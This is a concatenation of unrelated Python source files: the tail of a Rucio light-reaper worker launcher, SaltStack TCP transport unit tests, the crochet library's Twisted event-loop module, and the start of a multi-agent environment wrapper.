    logging.info('Light Reaper: This instance will work on VO%s: %s', 's' if len(vos) > 1 else '', ', '.join([v for v in vos]))
    all_rses = []
    for vo in vos:
        all_rses.extend(rse_core.list_rses(filters={'vo': vo}))
    if rses:
        # Restrict to the explicitly requested RSE names, validating them first.
        invalid = set(rses) - set([rse['rse'] for rse in all_rses])
        if invalid:
            msg = 'RSE{} {} cannot be found'.format('s' if len(invalid) > 1 else '',
                                                    ', '.join([repr(rse) for rse in invalid]))
            raise RSENotFound(msg)
        rses = [rse for rse in all_rses if rse['rse'] in rses]
    else:
        rses = all_rses
    # Apply RSE-expression include/exclude filters.
    if exclude_rses:
        excluded_rses = parse_expression(exclude_rses)
        rses = [rse for rse in rses if rse not in excluded_rses]
    if include_rses:
        included_rses = parse_expression(include_rses)
        rses = [rse for rse in rses if rse in included_rses]
    if not rses:
        logging.error('Light Reaper: No RSEs found. Exiting.')
        return
    threads = []
    for worker in range(total_workers):
        kwargs = {'worker_number': worker,
                  'total_workers': total_workers,
                  'rses': rses,
                  'once': once,
                  'chunk_size': chunk_size,
                  'scheme': scheme,
                  'sleep_time': sleep_time}
        threads.append(threading.Thread(target=reaper, kwargs=kwargs, name='Worker: %s, Total_Workers: %s' % (worker, total_workers)))
    [t.start() for t in threads]
    # Join with a timeout so the main thread stays responsive to signals.
    # NOTE(review): liveness is judged by threads[0] only — confirm intended.
    while threads[0].is_alive():
        [t.join(timeout=3.14) for t in threads]
|
test_tcp.py | """
:codeauthor: Thomas Jackson <jacksontj.89@gmail.com>
"""
import logging
import socket
import threading
import salt.config
import salt.exceptions
import salt.ext.tornado.concurrent
import salt.ext.tornado.gen
import salt.ext.tornado.ioloop
import salt.transport.client
import salt.transport.server
import salt.utils.platform
import salt.utils.process
from salt.ext.tornado.testing import AsyncTestCase, gen_test
from salt.transport.tcp import (
SaltMessageClient,
SaltMessageClientPool,
TCPPubServerChannel,
)
from saltfactories.utils.ports import get_unused_localhost_port
from tests.support.helpers import flaky, slowTest
from tests.support.mixins import AdaptedConfigurationTestCaseMixin
from tests.support.mock import MagicMock, patch
from tests.support.unit import TestCase, skipIf
from tests.unit.transport.mixins import (
PubChannelMixin,
ReqChannelMixin,
run_loop_in_thread,
)
log = logging.getLogger(__name__)
class BaseTCPReqCase(TestCase, AdaptedConfigurationTestCaseMixin):
    """
    Test the req server/client pair

    Spins up a TCP ReqServerChannel (with its own IOLoop running in a
    background thread) against temporary master/minion configs on unused
    localhost ports.  Subclasses supply ``_handle_payload``.
    """

    @classmethod
    def setUpClass(cls):
        # Abstract base has no payload handler: skip server setup entirely.
        if not hasattr(cls, "_handle_payload"):
            return
        ret_port = get_unused_localhost_port()
        publish_port = get_unused_localhost_port()
        tcp_master_pub_port = get_unused_localhost_port()
        tcp_master_pull_port = get_unused_localhost_port()
        tcp_master_publish_pull = get_unused_localhost_port()
        tcp_master_workers = get_unused_localhost_port()
        cls.master_config = cls.get_temp_config(
            "master",
            **{
                "transport": "tcp",
                "auto_accept": True,
                "ret_port": ret_port,
                "publish_port": publish_port,
                "tcp_master_pub_port": tcp_master_pub_port,
                "tcp_master_pull_port": tcp_master_pull_port,
                "tcp_master_publish_pull": tcp_master_publish_pull,
                "tcp_master_workers": tcp_master_workers,
            }
        )
        cls.minion_config = cls.get_temp_config(
            "minion",
            **{
                "transport": "tcp",
                "master_ip": "127.0.0.1",
                "master_port": ret_port,
                "master_uri": "tcp://127.0.0.1:{}".format(ret_port),
            }
        )
        cls.process_manager = salt.utils.process.ProcessManager(
            name="ReqServer_ProcessManager"
        )
        cls.server_channel = salt.transport.server.ReqServerChannel.factory(
            cls.master_config
        )
        cls.server_channel.pre_fork(cls.process_manager)
        # Run the server's IOLoop in a dedicated thread; cls.stop signals
        # run_loop_in_thread to shut it down in tearDownClass.
        cls.io_loop = salt.ext.tornado.ioloop.IOLoop()
        cls.stop = threading.Event()
        cls.server_channel.post_fork(cls._handle_payload, io_loop=cls.io_loop)
        cls.server_thread = threading.Thread(
            target=run_loop_in_thread, args=(cls.io_loop, cls.stop,),
        )
        cls.server_thread.start()

    @classmethod
    def tearDownClass(cls):
        # Tear down in reverse order of setUpClass: channel, loop thread, children.
        cls.server_channel.close()
        cls.stop.set()
        cls.server_thread.join()
        cls.process_manager.kill_children()
        del cls.server_channel

    @classmethod
    @salt.ext.tornado.gen.coroutine
    def _handle_payload(cls, payload):
        """
        TODO: something besides echo
        """
        raise salt.ext.tornado.gen.Return((payload, {"fun": "send_clear"}))
@skipIf(salt.utils.platform.is_darwin(), "hanging test suite on MacOS")
class ClearReqTestCases(BaseTCPReqCase, ReqChannelMixin):
    """
    Test all of the clear msg stuff

    Runs the shared ReqChannelMixin tests over an unencrypted ("clear")
    request channel; the server simply echoes payloads back.
    """

    def setUp(self):
        # Fresh clear-crypt client channel per test.
        self.channel = salt.transport.client.ReqChannel.factory(
            self.minion_config, crypt="clear"
        )

    def tearDown(self):
        self.channel.close()
        del self.channel

    @classmethod
    @salt.ext.tornado.gen.coroutine
    def _handle_payload(cls, payload):
        """
        TODO: something besides echo
        """
        raise salt.ext.tornado.gen.Return((payload, {"fun": "send_clear"}))
@skipIf(salt.utils.platform.is_darwin(), "hanging test suite on MacOS")
class AESReqTestCases(BaseTCPReqCase, ReqChannelMixin):
    """Runs the shared ReqChannelMixin tests over the default (AES) crypt."""

    def setUp(self):
        # Default crypt (AES) client channel per test.
        self.channel = salt.transport.client.ReqChannel.factory(self.minion_config)

    def tearDown(self):
        self.channel.close()
        del self.channel

    @classmethod
    @salt.ext.tornado.gen.coroutine
    def _handle_payload(cls, payload):
        """
        TODO: something besides echo
        """
        raise salt.ext.tornado.gen.Return((payload, {"fun": "send"}))

    # TODO: make failed returns have a specific framing so we can raise the same exception
    # on encrypted channels
    @flaky
    @slowTest
    def test_badload(self):
        """
        Test a variety of bad requests, make sure that we get some sort of error
        """
        msgs = ["", [], tuple()]
        for msg in msgs:
            with self.assertRaises(salt.exceptions.AuthenticationError):
                ret = self.channel.send(msg)
class BaseTCPPubCase(AsyncTestCase, AdaptedConfigurationTestCaseMixin):
    """
    Test the req server/client pair

    Like BaseTCPReqCase, but also starts a PubServerChannel; a
    ReqServerChannel is additionally needed because minion auth goes
    through the request channel.
    """

    @classmethod
    def setUpClass(cls):
        ret_port = get_unused_localhost_port()
        publish_port = get_unused_localhost_port()
        tcp_master_pub_port = get_unused_localhost_port()
        tcp_master_pull_port = get_unused_localhost_port()
        tcp_master_publish_pull = get_unused_localhost_port()
        tcp_master_workers = get_unused_localhost_port()
        cls.master_config = cls.get_temp_config(
            "master",
            **{
                "transport": "tcp",
                "auto_accept": True,
                "ret_port": ret_port,
                "publish_port": publish_port,
                "tcp_master_pub_port": tcp_master_pub_port,
                "tcp_master_pull_port": tcp_master_pull_port,
                "tcp_master_publish_pull": tcp_master_publish_pull,
                "tcp_master_workers": tcp_master_workers,
            }
        )
        cls.minion_config = cls.get_temp_config(
            "minion",
            **{
                "transport": "tcp",
                "master_ip": "127.0.0.1",
                "auth_timeout": 1,
                "master_port": ret_port,
                "master_uri": "tcp://127.0.0.1:{}".format(ret_port),
            }
        )
        cls.process_manager = salt.utils.process.ProcessManager(
            name="ReqServer_ProcessManager"
        )
        cls.server_channel = salt.transport.server.PubServerChannel.factory(
            cls.master_config
        )
        cls.server_channel.pre_fork(cls.process_manager)
        # we also require req server for auth
        cls.req_server_channel = salt.transport.server.ReqServerChannel.factory(
            cls.master_config
        )
        cls.req_server_channel.pre_fork(cls.process_manager)
        # Background IOLoop thread servicing the req channel; cls.stop shuts it down.
        cls.io_loop = salt.ext.tornado.ioloop.IOLoop()
        cls.stop = threading.Event()
        cls.req_server_channel.post_fork(cls._handle_payload, io_loop=cls.io_loop)
        cls.server_thread = threading.Thread(
            target=run_loop_in_thread, args=(cls.io_loop, cls.stop,),
        )
        cls.server_thread.start()

    @classmethod
    def _handle_payload(cls, payload):
        """
        TODO: something besides echo
        """
        return payload, {"fun": "send_clear"}

    @classmethod
    def tearDownClass(cls):
        cls.req_server_channel.close()
        cls.server_channel.close()
        cls.stop.set()
        cls.server_thread.join()
        cls.process_manager.kill_children()
        del cls.req_server_channel

    def setUp(self):
        super().setUp()
        # Snapshot the IOLoop's FD handlers so tearDown can detect leaks.
        self._start_handlers = dict(self.io_loop._handlers)

    def tearDown(self):
        super().tearDown()
        # Any handler added during the test and not removed is a leaked FD.
        failures = []
        for k, v in self.io_loop._handlers.items():
            if self._start_handlers.get(k) != v:
                failures.append((k, v))
        if failures:
            raise Exception("FDs still attached to the IOLoop: {}".format(failures))
        del self.channel
        del self._start_handlers
class AsyncTCPPubChannelTest(AsyncTestCase, AdaptedConfigurationTestCaseMixin):
    @slowTest
    def test_connect_publish_port(self):
        """
        test when publish_port is not 4506

        With auth mocked out, connect() must hand the configured
        publish_port through to the SaltMessageClientPool it creates.
        """
        opts = self.get_temp_config("master")
        opts["master_uri"] = ""
        opts["master_ip"] = "127.0.0.1"
        opts["publish_port"] = 1234
        channel = salt.transport.tcp.AsyncTCPPubChannel(opts)
        patch_auth = MagicMock(return_value=True)
        patch_client = MagicMock(spec=SaltMessageClientPool)
        # Bypass real authentication and the real client pool.
        with patch("salt.crypt.AsyncAuth.gen_token", patch_auth), patch(
            "salt.crypt.AsyncAuth.authenticated", patch_auth
        ), patch("salt.transport.tcp.SaltMessageClientPool", patch_client):
            channel.connect()
        # First positional arg to the pool is the opts dict.
        assert patch_client.call_args[0][0]["publish_port"] == opts["publish_port"]
@skipIf(True, "Skip until we can devote time to fix this test")
class AsyncPubChannelTest(BaseTCPPubCase, PubChannelMixin):
    """
    Tests around the publish system.
    All test methods come from PubChannelMixin; this class only binds them to
    the TCP transport fixtures. Currently skipped (see decorator).
    """
class SaltMessageClientPoolTest(AsyncTestCase):
    """
    Unit tests for SaltMessageClientPool fan-out behavior: each operation on
    the pool must delegate to every underlying SaltMessageClient and
    aggregate the results. The real clients are replaced with MagicMocks.
    """
    def setUp(self):
        super().setUp()
        sock_pool_size = 5
        # Neutralize SaltMessageClient.__init__ so the pool can be built
        # without opening sockets.
        with patch(
            "salt.transport.tcp.SaltMessageClient.__init__",
            MagicMock(return_value=None),
        ):
            self.message_client_pool = SaltMessageClientPool(
                {"sock_pool_size": sock_pool_size}, args=({}, "", 0)
            )
        # Keep the real (uninitialized) clients so tearDown can dispose of
        # them, then swap in inspectable mocks.
        self.original_message_clients = self.message_client_pool.message_clients
        self.message_client_pool.message_clients = [
            MagicMock() for _ in range(sock_pool_size)
        ]
    def tearDown(self):
        # close() on the half-constructed clients would fail; stub it out
        # while they are released.
        with patch(
            "salt.transport.tcp.SaltMessageClient.close", MagicMock(return_value=None)
        ):
            del self.original_message_clients
        super().tearDown()
    def test_send(self):
        """send() returns the concatenation of each client's send() result."""
        for message_client_mock in self.message_client_pool.message_clients:
            message_client_mock.send_queue = [0, 0, 0]
            message_client_mock.send.return_value = []
        self.assertEqual([], self.message_client_pool.send())
        self.message_client_pool.message_clients[2].send_queue = [0]
        self.message_client_pool.message_clients[2].send.return_value = [1]
        self.assertEqual([1], self.message_client_pool.send())
    def test_write_to_stream(self):
        """write_to_stream() aggregates each client's _stream.write()."""
        for message_client_mock in self.message_client_pool.message_clients:
            message_client_mock.send_queue = [0, 0, 0]
            message_client_mock._stream.write.return_value = []
        self.assertEqual([], self.message_client_pool.write_to_stream(""))
        self.message_client_pool.message_clients[2].send_queue = [0]
        self.message_client_pool.message_clients[2]._stream.write.return_value = [1]
        self.assertEqual([1], self.message_client_pool.write_to_stream(""))
    def test_close(self):
        """close() empties the pool's client list."""
        self.message_client_pool.close()
        self.assertEqual([], self.message_client_pool.message_clients)
    def test_on_recv(self):
        """on_recv() is forwarded to every client."""
        for message_client_mock in self.message_client_pool.message_clients:
            message_client_mock.on_recv.return_value = None
        self.message_client_pool.on_recv()
        for message_client_mock in self.message_client_pool.message_clients:
            self.assertTrue(message_client_mock.on_recv.called)
    def test_connect_all(self):
        """connect() resolves once every client's connect future resolves."""
        @gen_test
        def test_connect(self):
            yield self.message_client_pool.connect()
        for message_client_mock in self.message_client_pool.message_clients:
            future = salt.ext.tornado.concurrent.Future()
            future.set_result("foo")
            message_client_mock.connect.return_value = future
        self.assertIsNone(test_connect(self))
    def test_connect_partial(self):
        """connect() must NOT resolve while any client is still pending."""
        @gen_test(timeout=0.1)
        def test_connect(self):
            yield self.message_client_pool.connect()
        for idx, message_client_mock in enumerate(
            self.message_client_pool.message_clients
        ):
            future = salt.ext.tornado.concurrent.Future()
            # Leave every other future unresolved so the pooled connect hangs.
            if idx % 2 == 0:
                future.set_result("foo")
            message_client_mock.connect.return_value = future
        with self.assertRaises(salt.ext.tornado.ioloop.TimeoutError):
            test_connect(self)
class SaltMessageClientCleanupTest(TestCase, AdaptedConfigurationTestCaseMixin):
    """
    Verify SaltMessageClient tears down its IOLoop resources on close().
    A real listening socket is used so the client can actually connect.
    """
    def setUp(self):
        # Bind a throwaway TCP listener for the client to connect to.
        self.listen_on = "127.0.0.1"
        self.port = get_unused_localhost_port()
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.sock.bind((self.listen_on, self.port))
        self.sock.listen(1)
    def tearDown(self):
        self.sock.close()
        del self.sock
    def test_message_client(self):
        """
        test message client cleanup on close
        """
        orig_loop = salt.ext.tornado.ioloop.IOLoop()
        orig_loop.make_current()
        opts = self.get_temp_config("master")
        client = SaltMessageClient(opts, self.listen_on, self.port)
        # Mock the io_loop's stop method so we know when it has been called.
        orig_loop.real_stop = orig_loop.stop
        orig_loop.stop_called = False
        def stop(*args, **kwargs):
            orig_loop.stop_called = True
            orig_loop.real_stop()
        orig_loop.stop = stop
        try:
            assert client.io_loop == orig_loop
            client.io_loop.run_sync(client.connect)
            # Ensure we are testing the _read_until_future and io_loop teardown
            assert client._stream is not None
            assert client._read_until_future is not None
            assert orig_loop.stop_called is True
            # The run_sync call will set stop_called, reset it
            orig_loop.stop_called = False
            client.close()
            # Stop should be called again, client's io_loop should be None
            assert orig_loop.stop_called is True
            assert client.io_loop is None
        finally:
            # Restore the loop so other tests see an unpatched IOLoop.
            orig_loop.stop = orig_loop.real_stop
            del orig_loop.real_stop
            del orig_loop.stop_called
class TCPPubServerChannelTest(TestCase, AdaptedConfigurationTestCaseMixin):
    """
    Tests for TCPPubServerChannel.publish() topic filtering: the payload sent
    to the publisher should carry a 'topic_lst' only when the target type
    allows per-minion filtering (and never for syndic masters).
    """
    @patch("salt.master.SMaster.secrets")
    @patch("salt.crypt.Crypticle")
    @patch("salt.utils.asynchronous.SyncWrapper")
    def test_publish_filtering(self, sync_wrapper, crypticle, secrets):
        opts = self.get_temp_config("master")
        opts["sign_pub_messages"] = False
        channel = TCPPubServerChannel(opts)
        # wrap captures what publish() sends; crypt fakes encryption.
        wrap = MagicMock()
        crypt = MagicMock()
        crypt.dumps.return_value = {"test": "value"}
        secrets.return_value = {"aes": {"secret": None}}
        crypticle.return_value = crypt
        sync_wrapper.return_value = wrap
        # try simple publish with glob tgt_type
        channel.publish({"test": "value", "tgt_type": "glob", "tgt": "*"})
        payload = wrap.send.call_args[0][0]
        # verify we send it without any specific topic
        assert "topic_lst" not in payload
        # try simple publish with list tgt_type
        channel.publish({"test": "value", "tgt_type": "list", "tgt": ["minion01"]})
        payload = wrap.send.call_args[0][0]
        # verify we send it with correct topic
        assert "topic_lst" in payload
        self.assertEqual(payload["topic_lst"], ["minion01"])
        # try with syndic settings
        opts["order_masters"] = True
        channel.publish({"test": "value", "tgt_type": "list", "tgt": ["minion01"]})
        payload = wrap.send.call_args[0][0]
        # verify we send it without topic for syndics
        assert "topic_lst" not in payload
    @patch("salt.utils.minions.CkMinions.check_minions")
    @patch("salt.master.SMaster.secrets")
    @patch("salt.crypt.Crypticle")
    @patch("salt.utils.asynchronous.SyncWrapper")
    def test_publish_filtering_str_list(
        self, sync_wrapper, crypticle, secrets, check_minions
    ):
        """
        A string 'tgt' with tgt_type 'list' must be resolved through
        CkMinions.check_minions before the topic list is built.
        """
        opts = self.get_temp_config("master")
        opts["sign_pub_messages"] = False
        channel = TCPPubServerChannel(opts)
        wrap = MagicMock()
        crypt = MagicMock()
        crypt.dumps.return_value = {"test": "value"}
        secrets.return_value = {"aes": {"secret": None}}
        crypticle.return_value = crypt
        sync_wrapper.return_value = wrap
        check_minions.return_value = {"minions": ["minion02"]}
        # try simple publish with list tgt_type
        channel.publish({"test": "value", "tgt_type": "list", "tgt": "minion02"})
        payload = wrap.send.call_args[0][0]
        # verify we send it with correct topic
        assert "topic_lst" in payload
        self.assertEqual(payload["topic_lst"], ["minion02"])
        # verify it was correctly calling check_minions
        check_minions.assert_called_with("minion02", tgt_type="list")
|
_eventloop.py | """
Expose Twisted's event loop to threaded programs.
"""
from __future__ import absolute_import
import select
import threading
import weakref
import warnings
from functools import wraps
import imp
from twisted.python import threadable
from twisted.python.runtime import platform
from twisted.python.failure import Failure
from twisted.python.log import PythonLoggingObserver, err
from twisted.internet.defer import maybeDeferred
from twisted.internet.task import LoopingCall
import wrapt
from ._util import synchronized
from ._resultstore import ResultStore
_store = ResultStore()
# Prefer the stdlib WeakSet; very old interpreters lack it, in which case a
# minimal stand-in built on WeakKeyDictionary is defined instead.
WeakSet = getattr(weakref, "WeakSet", None)
if WeakSet is None:
    class WeakSet(object):
        """
        Minimal WeakSet emulation: supports add() and iteration only.
        """
        def __init__(self):
            self._items = weakref.WeakKeyDictionary()

        def add(self, value):
            self._items[value] = True

        def __iter__(self):
            return iter(self._items)
class TimeoutError(Exception): # pylint: disable=redefined-builtin
    """
    A timeout has been hit.

    Raised by EventualResult._result()/wait() when no result becomes
    available within the requested number of seconds.
    """
class ReactorStopped(Exception):
    """
    The reactor has stopped, and therefore no result will ever become
    available from this EventualResult.

    Delivered to registered EventualResults by ResultRegistry.stop().
    """
class ResultRegistry(object):
    """
    Keep track of EventualResults.
    Once the reactor has shutdown:
    1. Registering new EventualResult instances is an error, since no results
    will ever become available.
    2. Already registered EventualResult instances are "fired" with a
    ReactorStopped exception to unblock any remaining EventualResult.wait()
    calls.
    """
    def __init__(self):
        # Weak references only: the registry must not keep otherwise
        # unreferenced EventualResults alive.
        self._results = WeakSet()
        self._stopped = False
        # NOTE(review): @synchronized (from ._util) presumably acquires
        # self._lock around register()/stop() — confirm in _util.
        self._lock = threading.Lock()
    @synchronized
    def register(self, result):
        """
        Register an EventualResult.
        May be called in any thread.
        """
        if self._stopped:
            raise ReactorStopped()
        self._results.add(result)
    @synchronized
    def stop(self):
        """
        Indicate no more results will get pushed into EventualResults, since
        the reactor has stopped.
        This should be called in the reactor thread.
        """
        self._stopped = True
        for result in self._results:
            result._set_result(Failure(ReactorStopped()))
class EventualResult(object):
    """
    A blocking interface to Deferred results.
    This allows you to access results from Twisted operations that may not be
    available immediately, using the wait() method.
    In general you should not create these directly; instead use functions
    decorated with @run_in_reactor.
    """
    def __init__(self, deferred, _reactor):
        """
        The deferred parameter should be a Deferred or None indicating
        _connect_deferred will be called separately later.
        """
        self._deferred = deferred
        self._reactor = _reactor
        # Holds the eventual value or Failure; only read after _result_set
        # fires, so no lock is needed.
        self._value = None
        self._result_retrieved = False
        self._result_set = threading.Event()
        if deferred is not None:
            self._connect_deferred(deferred)
    def _connect_deferred(self, deferred):
        """
        Hook up the Deferred that that this will be the result of.
        Should only be run in Twisted thread, and only called once.
        """
        self._deferred = deferred
        # Because we use __del__, we need to make sure there are no cycles
        # involving this object, which is why we use a weakref:
        def put(result, eventual=weakref.ref(self)):
            eventual = eventual()
            if eventual:
                eventual._set_result(result)
            else:
                # The EventualResult was garbage collected before the
                # Deferred fired; at least report errors.
                err(result, "Unhandled error in EventualResult")
        deferred.addBoth(put)
    def _set_result(self, result):
        """
        Set the result of the EventualResult, if not already set.
        This can only happen in the reactor thread, either as a result of
        Deferred firing, or as a result of ResultRegistry.stop(). So, no need
        for thread-safety.
        """
        if self._result_set.isSet():
            return
        self._value = result
        self._result_set.set()
    def __del__(self):
        # Mirror Deferred's behavior: report a Failure nobody ever looked at.
        if self._result_retrieved or not self._result_set.isSet():
            return
        if isinstance(self._value, Failure):
            err(self._value, "Unhandled error in EventualResult")
    def cancel(self):
        """
        Try to cancel the operation by cancelling the underlying Deferred.
        Cancellation of the operation may or may not happen depending on
        underlying cancellation support and whether the operation has already
        finished. In any case, however, the underlying Deferred will be fired.
        Multiple calls will have no additional effect.
        """
        # Deferred.cancel must run in the reactor thread.
        self._reactor.callFromThread(lambda: self._deferred.cancel())
    def _result(self, timeout=None):
        """
        Return the result, if available.
        It may take an unknown amount of time to return the result, so a
        timeout option is provided. If the given number of seconds pass with
        no result, a TimeoutError will be thrown.
        If a previous call timed out, additional calls to this function will
        still wait for a result and return it if available. If a result was
        returned on one call, additional calls will return/raise the same
        result.
        """
        if timeout is None:
            warnings.warn(
                "Unlimited timeouts are deprecated.",
                DeprecationWarning,
                stacklevel=3)
            # Queue.get(None) won't get interrupted by Ctrl-C...
            timeout = 2 ** 28
        self._result_set.wait(timeout)
        # In Python 2.6 we can't rely on the return result of wait(), so we
        # have to check manually:
        if not self._result_set.is_set():
            raise TimeoutError()
        self._result_retrieved = True
        return self._value
    def wait(self, timeout=None):
        """
        Return the result, or throw the exception if result is a failure.
        It may take an unknown amount of time to return the result, so a
        timeout option is provided. If the given number of seconds pass with
        no result, a TimeoutError will be thrown.
        If a previous call timed out, additional calls to this function will
        still wait for a result and return it if available. If a result was
        returned or raised on one call, additional calls will return/raise the
        same result.
        """
        # Blocking in the reactor thread would deadlock the reactor itself.
        if threadable.isInIOThread():
            raise RuntimeError(
                "EventualResult.wait() must not be run in the reactor thread.")
        if imp.lock_held():
            try:
                imp.release_lock()
            except RuntimeError:
                # The lock is held by some other thread. We should be safe
                # to continue.
                pass
            else:
                # If EventualResult.wait() is run during module import, if the
                # Twisted code that is being run also imports something the
                # result will be a deadlock. Even if that is not an issue it
                # would prevent importing in other threads until the call
                # returns.
                raise RuntimeError(
                    "EventualResult.wait() must not be run at module "
                    "import time.")
        result = self._result(timeout)
        if isinstance(result, Failure):
            result.raiseException()
        return result
    def stash(self):
        """
        Store the EventualResult in memory for later retrieval.
        Returns a integer uid which can be passed to crochet.retrieve_result()
        to retrieve the instance later on.
        """
        return _store.store(self)
    def original_failure(self):
        """
        Return the underlying Failure object, if the result is an error.
        If no result is yet available, or the result was not an error, None is
        returned.
        This method is useful if you want to get the original traceback for an
        error result.
        """
        try:
            # Zero timeout: purely a non-blocking peek at the result.
            result = self._result(0.0)
        except TimeoutError:
            return None
        if isinstance(result, Failure):
            return result
        else:
            return None
class ThreadLogObserver(object):
    """
    A log observer that wraps another observer, and calls it in a thread.
    In particular, used to wrap PythonLoggingObserver, so that blocking
    logging.py Handlers don't block the event loop.
    """
    def __init__(self, observer):
        self._observer = observer
        # A private reactor is used purely as a thread-safe work queue
        # (via callFromThread); pick the best poller available.
        if getattr(select, "epoll", None):
            from twisted.internet.epollreactor import EPollReactor
            reactorFactory = EPollReactor
        elif getattr(select, "poll", None):
            from twisted.internet.pollreactor import PollReactor
            reactorFactory = PollReactor
        else:
            from twisted.internet.selectreactor import SelectReactor
            reactorFactory = SelectReactor
        self._logWritingReactor = reactorFactory()
        # Don't let this private reactor claim to be "the" IO thread.
        self._logWritingReactor._registerAsIOThread = False
        self._thread = threading.Thread(
            target=self._reader, name="CrochetLogWriter")
        self._thread.start()
    def _reader(self):
        """
        Runs in a thread, reads messages from a queue and writes them to
        the wrapped observer.
        """
        self._logWritingReactor.run(installSignalHandlers=False)
    def stop(self):
        """
        Stop the thread.
        """
        self._logWritingReactor.callFromThread(self._logWritingReactor.stop)
    def __call__(self, msg):
        """
        A log observer that writes to a queue.
        """
        def log():
            try:
                self._observer(msg)
            except Exception:
                # Lower-level logging system blew up, nothing we can do, so
                # just drop on the floor.
                pass
        self._logWritingReactor.callFromThread(log)
class EventLoop(object):
    """
    Initialization infrastructure for running a reactor in a thread.
    """
    def __init__(
        self,
        reactorFactory,
        atexit_register,
        startLoggingWithObserver=None,
        watchdog_thread=None,
        reapAllProcesses=None
    ):
        """
        reactorFactory: Zero-argument callable that returns a reactor.
        atexit_register: atexit.register, or look-alike.
        startLoggingWithObserver: Either None, or
            twisted.python.log.startLoggingWithObserver or lookalike.
        watchdog_thread: crochet._shutdown.Watchdog instance, or None.
        reapAllProcesses: twisted.internet.process.reapAllProcesses or
            lookalike.
        """
        self._reactorFactory = reactorFactory
        self._atexit_register = atexit_register
        self._startLoggingWithObserver = startLoggingWithObserver
        self._started = False
        # Backs the @synchronized methods (setup/no_setup).
        self._lock = threading.Lock()
        self._watchdog_thread = watchdog_thread
        self._reapAllProcesses = reapAllProcesses
    def _startReapingProcesses(self):
        """
        Start a LoopingCall that calls reapAllProcesses.
        """
        lc = LoopingCall(self._reapAllProcesses)
        lc.clock = self._reactor
        lc.start(0.1, False)
    def _common_setup(self):
        """
        The minimal amount of setup done by both setup() and no_setup().
        """
        self._started = True
        self._reactor = self._reactorFactory()
        self._registry = ResultRegistry()
        # We want to unblock EventualResult regardless of how the reactor is
        # run, so we always register this:
        self._reactor.addSystemEventTrigger(
            "before", "shutdown", self._registry.stop)
    @synchronized
    def setup(self):
        """
        Initialize the crochet library.
        This starts the reactor in a thread, and connect's Twisted's logs to
        Python's standard library logging module.
        This must be called at least once before the library can be used, and
        can be called multiple times.
        """
        # Idempotent: only the first call does any work.
        if self._started:
            return
        self._common_setup()
        if platform.type == "posix":
            self._reactor.callFromThread(self._startReapingProcesses)
        if self._startLoggingWithObserver:
            observer = ThreadLogObserver(PythonLoggingObserver().emit)
            def start():
                # Twisted is going to override warnings.showwarning; let's
                # make sure that has no effect:
                from twisted.python import log
                original = log.showwarning
                log.showwarning = warnings.showwarning
                self._startLoggingWithObserver(observer, False)
                log.showwarning = original
            self._reactor.callFromThread(start)
            # We only want to stop the logging thread once the reactor has
            # shut down:
            self._reactor.addSystemEventTrigger(
                "after", "shutdown", observer.stop)
        t = threading.Thread(
            target=lambda: self._reactor.run(installSignalHandlers=False),
            name="CrochetReactor")
        t.start()
        # Stop the reactor (and flush stored errors) at interpreter exit.
        self._atexit_register(self._reactor.callFromThread, self._reactor.stop)
        self._atexit_register(_store.log_errors)
        if self._watchdog_thread is not None:
            self._watchdog_thread.start()
    @synchronized
    def no_setup(self):
        """
        Initialize the crochet library with no side effects.
        No reactor will be started, logging is uneffected, etc.. Future calls
        to setup() will have no effect. This is useful for applications that
        intend to run Twisted's reactor themselves, and so do not want
        libraries using crochet to attempt to start it on their own.
        If no_setup() is called after setup(), a RuntimeError is raised.
        """
        if self._started:
            raise RuntimeError(
                "no_setup() is intended to be called once, by a"
                " Twisted application, before any libraries "
                "using crochet are imported and call setup().")
        self._common_setup()
    @wrapt.decorator
    def _run_in_reactor(self, function, _, args, kwargs):
        """
        Implementation: A decorator that ensures the wrapped function runs in
        the reactor thread.
        When the wrapped function is called, an EventualResult is returned.
        """
        def runs_in_reactor(result, args, kwargs):
            d = maybeDeferred(function, *args, **kwargs)
            result._connect_deferred(d)
        # The EventualResult is created first (with no Deferred) so it can be
        # handed back to the caller immediately; the Deferred is attached
        # later, from the reactor thread.
        result = EventualResult(None, self._reactor)
        self._registry.register(result)
        self._reactor.callFromThread(runs_in_reactor, result, args, kwargs)
        return result
    def run_in_reactor(self, function):
        """
        A decorator that ensures the wrapped function runs in the
        reactor thread.
        When the wrapped function is called, an EventualResult is returned.
        """
        result = self._run_in_reactor(function)
        # Backwards compatibility; use __wrapped__ instead.
        try:
            result.wrapped_function = function
        except AttributeError:
            pass
        return result
    def wait_for_reactor(self, function):
        """
        DEPRECATED, use wait_for(timeout) instead.
        A decorator that ensures the wrapped function runs in the reactor
        thread.
        When the wrapped function is called, its result is returned or its
        exception raised. Deferreds are handled transparently.
        """
        warnings.warn(
            "@wait_for_reactor is deprecated, use @wait_for instead",
            DeprecationWarning,
            stacklevel=2)
        # This will timeout, in theory. In practice the process will be dead
        # long before that.
        return self.wait_for(2**31)(function)
    def wait_for(self, timeout):
        """
        A decorator factory that ensures the wrapped function runs in the
        reactor thread.
        When the wrapped function is called, its result is returned or its
        exception raised. Deferreds are handled transparently. Calls will
        timeout after the given number of seconds (a float), raising a
        crochet.TimeoutError, and cancelling the Deferred being waited on.
        """
        def decorator(function):
            @wrapt.decorator
            def wrapper(function, _, args, kwargs):
                @self.run_in_reactor
                def run():
                    return function(*args, **kwargs)
                eventual_result = run()
                try:
                    return eventual_result.wait(timeout)
                except TimeoutError:
                    # Best-effort cancellation, then let the timeout
                    # propagate to the caller.
                    eventual_result.cancel()
                    raise
            result = wrapper(function)
            # Expose underling function for testing purposes; this attribute is
            # deprecated, use __wrapped__ instead:
            try:
                result.wrapped_function = function
            except AttributeError:
                pass
            return result
        return decorator
    def in_reactor(self, function):
        """
        DEPRECATED, use run_in_reactor.
        A decorator that ensures the wrapped function runs in the reactor
        thread.
        The wrapped function will get the reactor passed in as a first
        argument, in addition to any arguments it is called with.
        When the wrapped function is called, an EventualResult is returned.
        """
        warnings.warn(
            "@in_reactor is deprecated, use @run_in_reactor",
            DeprecationWarning,
            stacklevel=2)
        @self.run_in_reactor
        @wraps(function)
        def add_reactor(*args, **kwargs):
            return function(self._reactor, *args, **kwargs)
        return add_reactor
|
env_wrappers_poet_sp.py | """
Modified from OpenAI Baselines code to work with multi-agent envs
"""
import numpy as np
from multiprocessing import Process, Pipe
from baselines.common.vec_env import VecEnv, CloudpickleWrapper
def worker(remote, parent_remote, env_fn_wrapper):
    """
    Subprocess entry point: build one env from the pickled factory and serve
